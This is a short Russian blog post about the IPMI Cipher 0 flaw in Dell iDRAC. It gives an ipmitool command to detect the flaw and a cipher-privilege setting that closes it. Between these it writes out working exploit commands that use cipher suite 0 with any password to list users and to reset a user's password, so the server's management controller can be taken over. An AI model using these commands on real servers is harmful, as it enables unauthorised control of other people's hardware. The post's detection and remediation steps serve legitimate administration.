Dell iDrac IPMI Cipher 0 дыра

Как выяснилось недавно, на Dell iDrac есть одна очень интересная уязвимость, называемая IPMI Cipher 0, как проверить что она есть у Вас

ipmitool -H xx.xx.xx.xx -U root -P password lan print| grep 'Cipher Suite Priv Max'

если в выхлопе будет нечто подобное:

Cipher Suite Priv Max   : aaaaaaaaaaaaaaa

поздравляю, Ваш драк можно сношать как душе угодно!
например, получим список пользователей

ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user list

а теперь изменим пас какому-либо пользователю

ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user set password 5 SuperPuper123

и пробуем авторизоваться через веб, удивлены?
Закрыть можно следующим образом

ipmitool -H xx.xx.xx.xx -U root -P password  lan set 1 cipher_privs XXXaXXXXXXXXXXX 

теперь снова пробуем

ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user list

и в итоге

Error in open session response message : no matching cipher suite
Error: Unable to establish IPMI v2 / RMCP+ session
Set User Password command failed (user 5)

Подробности...